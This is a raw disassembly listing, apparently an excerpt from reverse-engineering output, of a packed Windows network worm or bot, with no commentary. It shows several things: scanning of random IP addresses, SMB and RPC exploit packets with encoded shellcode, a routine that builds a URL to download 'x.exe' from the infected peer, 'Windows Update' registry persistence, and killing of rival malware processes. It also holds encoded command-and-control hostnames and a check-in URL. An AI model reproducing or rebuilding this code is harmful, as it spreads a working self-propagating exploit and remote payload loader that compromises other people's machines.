sub_31602617 proc near ; DATA XREF: UPX0:316027E7�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31601ED5
call sub_31602378
test eax, eax
jnz loc_316026D0
push ebx
mov ebx, dword_31601094
push esi
mov esi, dword_316010FC
push edi
loc_3160263D: ; CODE XREF: sub_31602617+48�j
; sub_31602617+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_3160264C: ; CODE XREF: sub_31602617+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_3160264C
call sub_31601FD3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_3160263D
call sub_31602012
test eax, eax
jz short loc_316026A8
push offset dword_31604FE4
call dword_316010D4 ; InterlockedIncrement
push edi
call sub_316017DB
test eax, eax
pop ecx
jnz short loc_316026AF
push edi
push offset sub_3160252B
call sub_31601F2C
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_31602694: ; CODE XREF: sub_31602617+8D�j
push edi
push offset sub_3160258F
call sub_31601F2C
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_31602694
jmp short loc_316026AF
; ---------------------------------------------------------------------------
loc_316026A8: ; CODE XREF: sub_31602617+51�j
push 2710h
call ebx ; Sleep
loc_316026AF: ; CODE XREF: sub_31602617+67�j
; sub_31602617+8F�j
movzx edi, word_31604FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31602378
test eax, eax
jz loc_3160263D
pop edi
pop esi
pop ebx
loc_316026D0: ; CODE XREF: sub_31602617+11�j
push 0
call dword_316010D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_31602617 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316026DE proc near ; CODE XREF: UPX0:316027AC�p
; UPX0:loc_31602812�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31601FD3
push eax
call dword_3160115C ; inet_ntoa
mov esi, dword_31601068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_31604FDC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3160111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_316042BA
call esi ; lstrcpyA
push offset byte_316042B8
call dword_31601084 ; lstrlenA
mov byte_316042B8[eax], 0DFh
pop esi
leave
retn
sub_316026DE endp
; ---------------------------------------------------------------------------
loc_3160273A: ; DATA XREF: sub_3160238C+158�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31604FE4, ebx
call sub_31602012
mov esi, dword_31601094
mov edi, 1388h
test eax, eax
jnz short loc_31602768
loc_3160275C: ; CODE XREF: UPX0:31602766�j
push edi
call esi ; Sleep
call sub_31602012
test eax, eax
jz short loc_3160275C
loc_31602768: ; CODE XREF: UPX0:3160275A�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31601130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31604FE8, ebx
pop ebp
mov word_31604FEC, 96h
jz short loc_316027A5
mov dword_31604FE8, 1
mov ebp, 15Eh
mov word_31604FEC, 14h
loc_316027A5: ; CODE XREF: UPX0:3160278B�j
call sub_31601FD3
mov ebx, eax
call sub_316026DE
cmp ebx, 100007Fh
jz short loc_316027C6
push ebx
push offset sub_3160252B
call sub_31601F2C
pop ecx
pop ecx
loc_316027C6: ; CODE XREF: UPX0:316027B7�j
mov dword ptr [esp+10h], 4
loc_316027CE: ; CODE XREF: UPX0:316027DF�j
push ebx
push offset sub_3160258F
call sub_31601F2C
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_316027CE
test ebp, ebp
jle short loc_316027F6
loc_316027E5: ; CODE XREF: UPX0:316027F4�j
push 0
push offset sub_31602617
call sub_31601F2C
pop ecx
dec ebp
pop ecx
jnz short loc_316027E5
loc_316027F6: ; CODE XREF: UPX0:316027E3�j
; UPX0:31602802�j ...
call sub_31602012
test eax, eax
jz short loc_31602804
push edi
call esi ; Sleep
jmp short loc_316027F6
; ---------------------------------------------------------------------------
loc_31602804: ; CODE XREF: UPX0:316027FD�j
; UPX0:31602810�j
call sub_31602012
test eax, eax
jnz short loc_31602812
push edi
call esi ; Sleep
jmp short loc_31602804
; ---------------------------------------------------------------------------
loc_31602812: ; CODE XREF: UPX0:3160280B�j
call sub_316026DE
jmp short loc_316027F6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602819 proc near ; CODE XREF: sub_316029B2+8C�p
; sub_31602B2C+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3160100C ; RegOpenKeyExA
test eax, eax
jnz short loc_3160284C
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31601010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31601014 ; RegCloseKey
loc_3160284C: ; CODE XREF: sub_31602819+1C�j
pop ebp
retn
sub_31602819 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160284E proc near ; CODE XREF: sub_3160219E+33�p
; sub_316029B2+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3160100C ; RegOpenKeyExA
test eax, eax
jz short loc_3160287A
push 1
pop eax
jmp short loc_316028A4
; ---------------------------------------------------------------------------
loc_3160287A: ; CODE XREF: sub_3160284E+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31601008 ; RegQueryValueExA
test eax, eax
jz short loc_31602899
push 2
pop esi
loc_31602899: ; CODE XREF: sub_3160284E+46�j
push [ebp+arg_10]
call dword_31601014 ; RegCloseKey
mov eax, esi
loc_316028A4: ; CODE XREF: sub_3160284E+2A�j
pop esi
leave
retn
sub_3160284E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316028A7 proc near ; CODE XREF: sub_31602A60+96�p
; sub_31602B2C+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31601000 ; RegCreateKeyExA
test eax, eax
jz short loc_316028D0
push 1
pop eax
jmp short loc_316028F7
; ---------------------------------------------------------------------------
loc_316028D0: ; CODE XREF: sub_316028A7+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31601004 ; RegSetValueExA
test eax, eax
jz short loc_316028EC
push 2
pop esi
loc_316028EC: ; CODE XREF: sub_316028A7+40�j
push [ebp+arg_4]
call dword_31601014 ; RegCloseKey
mov eax, esi
loc_316028F7: ; CODE XREF: sub_316028A7+27�j
pop esi
pop ebp
retn
sub_316028A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316028FA proc near ; CODE XREF: sub_316029B2+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31601084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_316029AE
loc_3160291A: ; CODE XREF: sub_316028FA+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31602923
dec esi
jns short loc_3160291A
loc_31602923: ; CODE XREF: sub_316028FA+24�j
push 0
push 2
call sub_31602CEC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_316029AE
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31602C96 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31602CE6 ; Process32First
test eax, eax
jz short loc_316029AE
lea esi, [esi+ebx+1]
loc_3160296B: ; CODE XREF: sub_316028FA+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31601104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3160299B
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_316010B0 ; OpenProcess
push 0
push eax
call dword_31601060 ; TerminateProcess
loc_3160299B: ; CODE XREF: sub_316028FA+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31602CE0 ; Process32Next
test eax, eax
jnz short loc_3160296B
loc_316029AE: ; CODE XREF: sub_316028FA+1A�j
; sub_316028FA+38�j ...
pop esi
pop ebx
leave
retn
sub_316028FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316029B2 proc near ; CODE XREF: UPX0:31602355�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31602A1B: ; CODE XREF: sub_316029B2+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jnz short loc_31602A52
push ebx
push edi
push esi
call sub_31602819
lea eax, [ebp+var_138]
push eax
call sub_316028FA
add esp, 10h
loc_31602A52: ; CODE XREF: sub_316029B2+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31602A1B
pop edi
pop esi
pop ebx
leave
retn
sub_316029B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602A60 proc near ; CODE XREF: sub_31602B2C+D1�p
; sub_31602B2C+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31602A75
push [ebp+arg_0]
call dword_31601074 ; DeleteFileA
loc_31602A75: ; CODE XREF: sub_31602A60+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3160108C ; GetSystemDirectoryA
test eax, eax
jz locret_31602B2A
push esi
call dword_316010FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31601F4D
mov esi, dword_31601088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_316041F0
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset dword_316041F8
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31601050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31601084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_316028A7
add esp, 14h
push dword_31604FD4
call dword_3160107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31601054 ; WinExec
push 1F4h
call dword_31601094 ; Sleep
push 0
call dword_316010E0 ; ExitProcess
pop esi
locret_31602B2A: ; CODE XREF: sub_31602A60+23�j
leave
retn
sub_31602A60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602B2C proc near ; CODE XREF: UPX0:3160235A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31601048 ; GetModuleFileNameA
test eax, eax
jz loc_31602C65
and dword_31604FF0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jz short loc_31602BB2
call dword_316010FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31601F4D
pop ecx
pop ecx
push ebx
call dword_31601084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_316028A7
add esp, 14h
jmp short loc_31602BC1
; ---------------------------------------------------------------------------
loc_31602BB2: ; CODE XREF: sub_31602B2C+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31601068 ; lstrcpyA
loc_31602BC1: ; CODE XREF: sub_31602B2C+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jz short loc_31602C07
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_316028A7
lea eax, [ebp+var_84]
push eax
push 0
call sub_31602A60
add esp, 1Ch
jmp short loc_31602C65
; ---------------------------------------------------------------------------
loc_31602C07: ; CODE XREF: sub_31602B2C+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3160104C ; lstrcmpiA
test eax, eax
jnz short loc_31602C50
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jnz short loc_31602C65
push ebx
push edi
push esi
mov dword_31604FF0, 1
call sub_31602819
add esp, 0Ch
jmp short loc_31602C65
; ---------------------------------------------------------------------------
loc_31602C50: ; CODE XREF: sub_31602B2C+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31602A60
pop ecx
pop ecx
loc_31602C65: ; CODE XREF: sub_31602B2C+1F�j
; sub_31602B2C+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31602B2C endp
; =============== S U B R O U T I N E =======================================
sub_31602C6A proc near ; CODE XREF: sub_316011A0+CA�p
; sub_316015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31601044 ; VirtualAlloc
retn
sub_31602C6A endp
; =============== S U B R O U T I N E =======================================
sub_31602C7E proc near ; CODE XREF: sub_316011A0+10B�p
; sub_316015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31601040 ; VirtualFree
retn
sub_31602C7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602C90 proc near ; DATA XREF: sub_31601422+A�o
; sub_3160238C+A�o
jmp dword_31601100
sub_31602C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602C96 proc near ; CODE XREF: sub_316017DB+128�p
; sub_316017DB+134�p ...
jmp dword_316010F8
sub_31602C96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602C9C proc near ; CODE XREF: sub_316017DB+9C�p
; sub_316017DB+C5�p ...
jmp dword_316010F4
sub_31602C9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CA2 proc near ; CODE XREF: sub_316017DB+93�p
; sub_316017DB+B2�p ...
jmp dword_316010F0
sub_31602CA2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31602CB0 proc near ; CODE XREF: sub_316017DB+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31602CD0
loc_31602CBC: ; CODE XREF: sub_31602CB0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31602CBC
loc_31602CD0: ; CODE XREF: sub_31602CB0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31602CB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CE0 proc near ; CODE XREF: sub_316028FA+AB�p
jmp dword_31601064
sub_31602CE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CE6 proc near ; CODE XREF: sub_316028FA+64�p
jmp dword_3160105C
sub_31602CE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CEC proc near ; CODE XREF: sub_316028FA+2D�p
jmp dword_31601058
sub_31602CEC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4C3h dup(0)
dword_31604000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31601422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_316015C7+84�o
align 10h
byte_31604080 db 0 ; DATA XREF: sub_3160169C+15�r
off_31604081 dd offset dword_316041E4 ; DATA XREF: sub_3160169C+1D�r
align 2
dd offset dword_316041D4
dw 0C401h
dd 1316041h, 316041B4h, 6041A000h, 41900131h, 80013160h
dd 316041h, 31604174h, 60416800h, 41580131h, 48003160h
dd 1316041h, 3160413Ch, 60417400h, 41D40131h, 30003160h
dd 316041h, 316041D4h, 60412001h, 41480031h, 10013160h
dd 316041h, 31604130h, 60410001h, 40F80131h, 74003160h
dd 316041h, 31604130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_316041D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_316041E4 dd 617A616Dh, 616B6166h, 75722Ehdword_316041F0 dd 6578652Eh, 0 ; sub_31602058+55�o ...
dword_316041F8 dd 5Ch ; sub_31602A60+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_316011A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31601316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31601316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31601422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_316015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=18&cnt=%s',0
; DATA XREF: sub_316015C7+57�o
align 8
byte_316042B8 db 0EBh ; DATA XREF: sub_316017DB+24E�o
; sub_316017DB+260�o ...
db 58h
word_316042BA dw 7468h ; DATA XREF: sub_316026DE+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A1h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31604580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_316017DB+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3160460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_316046B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31604798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_316017DB+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_316047FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31604868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3160490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3160498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31604A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31604A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31604B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
